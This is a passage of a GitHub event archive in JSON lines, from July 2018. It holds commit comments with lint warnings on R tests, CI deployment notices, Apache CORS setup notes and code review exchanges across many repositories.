reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-14T13:58:52Z"}
{"id":"7965823891","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709413,"position":null,"line":null,"path":null,"commit_id":"ad9b5aaa5dc069683d2d34871b6757a7fd13df18","created_at":"2018-07-14T13:59:53Z","updated_at":"2018-07-14T13:59:53Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-119](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-119).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-119-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:59:53Z"}
{"id":"7965824730","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709422,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T14:00:25Z","updated_at":"2018-07-14T14:00:25Z","author_association":"NONE","body":"如果「𠫓」字頭需要兼容「大戈」「卜戈」，那麼「𣹭」似乎應加上「水大女水」，且將「水卜女水」標為 [uv]。\r\n\r\n「𣹳」eyve也可以標記為 [uv]。"}},"created_at":"2018-07-14T14:00:25Z"}
{"id":"7965826853","type":"CommitCommentEvent","actor":{"login":"ufo95"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29709426,"position":148,"line":558,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-14T14:01:57Z","updated_at":"2018-07-14T14:01:57Z","author_association":"OWNER","body":"I don't know what you mean exactly, if we didnt have a singlestep feature on ARM the single SMC approach would work only one time because we could not reinject the SMC after handling one event.\r\n\r\nI just tested it on the board and when I remove this line the board behaves exactly as I described above."}},"created_at":"2018-07-14T14:01:57Z"}
{"id":"7965827293","type":"CommitCommentEvent","actor":{"login":"EvgenyKovalev"},"repo":{"name":"EvgenyKovalev/github-slideshow"},"payload":{"comment":{"id":29709427,"position":null,"line":null,"path":null,"commit_id":"cec9ba1d1ff32c538ad5127571d573036ec02e7f","created_at":"2018-07-14T14:02:14Z","updated_at":"2018-07-14T14:02:14Z","author_association":"OWNER","body":"gv"}},"created_at":"2018-07-14T14:02:14Z"}
{"id":"7965834201","type":"CommitCommentEvent","actor":{"login":"hellolongting"},"repo":{"name":"superferryman/HelloGit"},"payload":{"comment":{"id":29709431,"position":null,"line":null,"path":null,"commit_id":"ed204af9efc10b278541603e9084044fa53d1d58","created_at":"2018-07-14T14:07:21Z","updated_at":"2018-07-14T14:07:21Z","author_association":"NONE","body":"谈大佬。。。教教我"}},"created_at":"2018-07-14T14:07:21Z"}
{"id":"7965834256","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29709432,"position":null,"line":null,"path":null,"commit_id":"9896b50ab30b5f748d65d0f930d8070c9d0daa11","created_at":"2018-07-14T14:07:24Z","updated_at":"2018-07-14T14:07:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-140723 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-140723\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T14:07:24Z"}
{"id":"7965834987","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709434,"position":null,"line":null,"path":null,"commit_id":"d76cbeaa9737a7ac3dd58a698859e513d2066aac","created_at":"2018-07-14T14:07:59Z","updated_at":"2018-07-14T14:07:59Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-8](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-8).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-8-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:07:59Z"}
{"id":"7965835193","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"intendia-oss/autorest"},"payload":{"comment":{"id":29709435,"position":5,"line":53,"path":"core/src/main/java/com/intendia/gwt/autorest/client/CollectorResourceVisitor.java","commit_id":"1e06d2fbd78fd83d6576c403288f1caa6964f29f","created_at":"2018-07-14T14:08:09Z","updated_at":"2018-07-14T14:08:09Z","author_association":"MEMBER","body":"although we have found some similar situation mapping a third party API, I still not sure that allowing empty string is a good idea, actually empty probably means unset, and upset things should no even call the Collector method (in this case path(String)."}},"created_at":"2018-07-14T14:08:09Z"}
{"id":"7965838910","type":"CommitCommentEvent","actor":{"login":"burningice2866"},"repo":{"name":"Orckestra/C1-CMS-Foundation"},"payload":{"comment":{"id":29709438,"position":null,"line":null,"path":null,"commit_id":"eb51f097e6196fa4fa5e5fb60599faf5dfa38866","created_at":"2018-07-14T14:10:59Z","updated_at":"2018-07-14T14:10:59Z","author_association":"CONTRIBUTOR","body":"@napernik It turns out this change breaks existing solutions which rely on manipulation the sitemap-structure at startup since this commit basically makes the SiteMap immutable."}},"created_at":"2018-07-14T14:10:59Z"}
{"id":"7965840025","type":"CommitCommentEvent","actor":{"login":"benklenk"},"repo":{"name":"benklenk/horizons-hackathon"},"payload":{"comment":{"id":29709440,"position":null,"line":null,"path":null,"commit_id":"891effff058c2c660ffabccff06d7f3cfd027dc3","created_at":"2018-07-14T14:11:55Z","updated_at":"2018-07-14T14:11:55Z","author_association":"OWNER","body":"yikes."}},"created_at":"2018-07-14T14:11:55Z"}
{"id":"7965840699","type":"CommitCommentEvent","actor":{"login":"Haikenz"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29709442,"position":null,"line":null,"path":null,"commit_id":"3e269ace667656de9356aef82ad9511d6daab998","created_at":"2018-07-14T14:12:32Z","updated_at":"2018-07-14T14:12:32Z","author_association":"NONE","body":"![screentbro003](https://user-images.githubusercontent.com/17690412/42725226-a11845de-8756-11e8-9d19-554746b15c78.jpg)\r\nIt reappeared! was to show only the Alchemist class"}},"created_at":"2018-07-14T14:12:32Z"}
{"id":"7965841506","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709447,"position":null,"line":null,"path":null,"commit_id":"8c2797c663e6253cad0ba98083e96f5d7150e997","created_at":"2018-07-14T14:13:09Z","updated_at":"2018-07-14T14:13:09Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-8](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-8).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-8-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:13:09Z"}
{"id":"7965842004","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29709448,"position":148,"line":558,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-14T14:13:32Z","updated_at":"2018-07-14T14:13:32Z","author_association":"NONE","body":"The Xen version, you are currently using is able to do so. We have extended it by a single-stepping mechanism such that it works with this implementation above - and this is fine :) However, as we remember, we agreed upon using the double SMC SS approach instead of the hardware mechanism (it is possible that the old implementation used the same define for chosing that -- VMI_EVENT_RESPONSE_TOGGLE_SINGLESTEP -- though). Without the SS code, it is difficulf from here to say whether it is fine. So, in the end, the board should single-step instructions through the double SMC approach :)"}},"created_at":"2018-07-14T14:13:32Z"}
{"id":"7965842769","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29709449,"position":null,"line":null,"path":null,"commit_id":"00de0c028c92dd084e128f810070da83f2024578","created_at":"2018-07-14T14:14:09Z","updated_at":"2018-07-14T14:14:09Z","author_association":"OWNER","body":"Fix #14 "}},"created_at":"2018-07-14T14:14:09Z"}
{"id":"7965843240","type":"CommitCommentEvent","actor":{"login":"winade"},"repo":{"name":"winade/winade-django"},"payload":{"comment":{"id":29709450,"position":null,"line":null,"path":null,"commit_id":"c0ab15fa6dc2852d8c179e4af10b42d6d4c3de7e","created_at":"2018-07-14T14:14:34Z","updated_at":"2018-07-14T14:14:34Z","author_association":"OWNER","body":"we are python django"}},"created_at":"2018-07-14T14:14:34Z"}
{"id":"7965843468","type":"CommitCommentEvent","actor":{"login":"mountaser"},"repo":{"name":"Dark-Matter7232/Moded_Moun_Kernel_Tissot"},"payload":{"comment":{"id":29709451,"position":null,"line":null,"path":null,"commit_id":"79ed3d7911909149e5a170a89ac74cf01efafcb4","created_at":"2018-07-14T14:14:46Z","updated_at":"2018-07-14T14:14:46Z","author_association":"NONE","body":"lol "}},"created_at":"2018-07-14T14:14:46Z"}
{"id":"7965845017","type":"CommitCommentEvent","actor":{"login":"mountaser"},"repo":{"name":"Dark-Matter7232/Moded_Moun_Kernel_Tissot"},"payload":{"comment":{"id":29709455,"position":null,"line":null,"path":null,"commit_id":"a34ad62bbfe2c76f29bdb1592fc56418061e3c78","created_at":"2018-07-14T14:15:54Z","updated_at":"2018-07-14T14:15:54Z","author_association":"NONE","body":"now thats how you truly upstream the kernel !!!"}},"created_at":"2018-07-14T14:15:54Z"}
{"id":"7965845068","type":"CommitCommentEvent","actor":{"login":"BeermotorWB"},"repo":{"name":"BeermotorWB/wrye-bash"},"payload":{"comment":{"id":29709456,"position":10,"line":142,"path":"Mopy/bash/game/skyrimse/__init__.py","commit_id":"2dd08b44baaf628ad2908289b12f177b5afbe9ed","created_at":"2018-07-14T14:15:56Z","updated_at":"2018-07-14T14:15:56Z","author_association":"OWNER","body":"I think they're all there and now that the errors are gone it's on-par with the Skyrim LE version. I really would like to have others take a look at the resultant bashed patches to see if there are any remaining issues that need to be worked out."}},"created_at":"2018-07-14T14:15:56Z"}
{"id":"7965846026","type":"CommitCommentEvent","actor":{"login":"SrinivasanTarget"},"repo":{"name":"saikrishna321/AppiumTestDistribution"},"payload":{"comment":{"id":29709458,"position":34,"line":31,"path":"src/main/java/com/appium/utils/Retry.java","commit_id":"76c144b9b907b42c4d2c77e787ee30c127f1e6ff","created_at":"2018-07-14T14:16:41Z","updated_at":"2018-07-14T14:16:41Z","author_association":"COLLABORATOR","body":"Fixed"}},"created_at":"2018-07-14T14:16:41Z"}
{"id":"7965846477","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29709459,"position":null,"line":null,"path":null,"commit_id":"cb9e9cb7e001ba463b4debe102cd0ccfa006328c","created_at":"2018-07-14T14:17:03Z","updated_at":"2018-07-14T14:17:03Z","author_association":"COLLABORATOR","body":"@philsupertramp das css krams wird dir wohl fehlen, aber wenn detail usw fertig ist mach ich das einheitlich"}},"created_at":"2018-07-14T14:17:03Z"}
{"id":"7965847392","type":"CommitCommentEvent","actor":{"login":"camara94"},"repo":{"name":"camara94/config_srv_ajax"},"payload":{"comment":{"id":29709460,"position":2,"line":2,"path":"README.md","commit_id":"e18eb9b1c6657de52c67bbc6d426320034d188be","created_at":"2018-07-14T14:17:46Z","updated_at":"2018-07-14T14:17:46Z","author_association":"OWNER","body":"\r\nOn fait un copier/coller à la fin du fichier \"httpd.conf\" qui se trouve à l'emplacement suivant pour moi wamp est\r\ninstaller le disque C :\r\nC:\\wamp64\\bin\\apache\\apache2.4.33\\conf\\httpd.conf\r\n\r\n<IfModule mod_headers.c>\r\n        # Accept cross-domain requests\r\n        Header always set Access-Control-Allow-Origin \"*\"\r\n        Header always set Access-Control-Allow-Headers \"Content-Type\"\r\n</IfModule>"}},"created_at":"2018-07-14T14:17:46Z"}
{"id":"7965848021","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709461,"position":null,"line":null,"path":null,"commit_id":"dc4a9502bd9954cf6ee9025ccef69107e195ef54","created_at":"2018-07-14T14:18:13Z","updated_at":"2018-07-14T14:18:13Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:18:13Z"}
{"id":"7965848139","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709462,"position":null,"line":null,"path":null,"commit_id":"ea3350bd0f32023e06a431c500a6b971034614dc","created_at":"2018-07-14T14:18:18Z","updated_at":"2018-07-14T14:18:18Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:18:18Z"}
{"id":"7965849253","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29709464,"position":12,"line":14,"path":"mscore/inspector/inspector_harmony.ui","commit_id":"1fff7f6a1557cf25cc16ae73f87b2eec6c479362","created_at":"2018-07-14T14:19:15Z","updated_at":"2018-07-14T14:19:15Z","author_association":"CONTRIBUTOR","body":"This is surely wrong"}},"created_at":"2018-07-14T14:19:15Z"}
{"id":"7965849632","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29709465,"position":21,"line":47,"path":"mscore/inspector/inspector_harmony.ui","commit_id":"1fff7f6a1557cf25cc16ae73f87b2eec6c479362","created_at":"2018-07-14T14:19:33Z","updated_at":"2018-07-14T14:19:33Z","author_association":"CONTRIBUTOR","body":"and this debatable"}},"created_at":"2018-07-14T14:19:33Z"}
{"id":"7965849692","type":"CommitCommentEvent","actor":{"login":"deenski"},"repo":{"name":"deenski/speakDotJakeVendegna"},"payload":{"comment":{"id":29709466,"position":null,"line":null,"path":null,"commit_id":"88f61b6cef6ea6c110531fd4f3147996722fa365","created_at":"2018-07-14T14:19:36Z","updated_at":"2018-07-14T14:19:36Z","author_association":"OWNER","body":"may help with #1 "}},"created_at":"2018-07-14T14:19:36Z"}
{"id":"7965850578","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709467,"position":null,"line":null,"path":null,"commit_id":"7cf9895f1ddb880f5d81785098ff569f931116b3","created_at":"2018-07-14T14:20:19Z","updated_at":"2018-07-14T14:20:19Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:20:19Z"}
{"id":"7965850777","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29709468,"position":6,"line":39,"path":"src/main/java/ch/njol/skript/effects/EffMakeFly.java","commit_id":"880e3de132ab0f6eb24d10819118f037a1b906de","created_at":"2018-07-14T14:20:28Z","updated_at":"2018-07-14T14:20:28Z","author_association":"MEMBER","body":"The effect doesn't only allow forcing to fly but also force a player to stop flying so it'd be a bit misleading. My description is probably a bit vague but good enough for people to understand it."}},"created_at":"2018-07-14T14:20:28Z"}
{"id":"7965850840","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29709469,"position":25,"line":306,"path":"compile.rkt","commit_id":"5cc972db9c57414cc78e828bf7190b5d33958a09","created_at":"2018-07-14T14:20:31Z","updated_at":"2018-07-14T14:20:31Z","author_association":"COLLABORATOR","body":"Maybe `compile-binary` takes `shared?` as an argument? That way `compile-library` and  `compile-exe` could just be wrappers."}},"created_at":"2018-07-14T14:20:31Z"}
{"id":"7965851004","type":"CommitCommentEvent","actor":{"login":"iprenez"},"repo":{"name":"iprenez/1739Project-1"},"payload":{"comment":{"id":29709470,"position":null,"line":null,"path":null,"commit_id":"d2d82d50dae7d2eb28c47628cb59b2e614fbf25e","created_at":"2018-07-14T14:20:39Z","updated_at":"2018-07-14T14:20:39Z","author_association":"OWNER","body":"name and links added\r\n[1739 Level 2 Diploma Group_ProjectLinks.docx](https://github.com/iprenez/1739Project-1/files/2194983/1739.Level.2.Diploma.Group_ProjectLinks.docx)\r\n"}},"created_at":"2018-07-14T14:20:39Z"}
{"id":"7965851359","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29709472,"position":null,"line":null,"path":null,"commit_id":"3c1ef7353dbbd9a4c84f5aadbcdd4ef5f5b7eedf","created_at":"2018-07-14T14:20:57Z","updated_at":"2018-07-14T14:20:57Z","author_association":"CONTRIBUTOR","body":"@cala why did you move the codeblock again"}},"created_at":"2018-07-14T14:20:57Z"}
{"id":"7965851440","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29709473,"position":25,"line":306,"path":"compile.rkt","commit_id":"5cc972db9c57414cc78e828bf7190b5d33958a09","created_at":"2018-07-14T14:21:02Z","updated_at":"2018-07-14T14:21:02Z","author_association":"OWNER","body":"That's what I thought I said"}},"created_at":"2018-07-14T14:21:02Z"}
{"id":"7965852247","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29709475,"position":160,"line":323,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T14:21:44Z","updated_at":"2018-07-14T14:21:44Z","author_association":"COLLABORATOR","body":"Sorry, this was a mistake; I'm having some trouble getting the real test modules to run, so I made this one quickly to test compilation. I sent you an email about the issue I'm having."}},"created_at":"2018-07-14T14:21:44Z"}
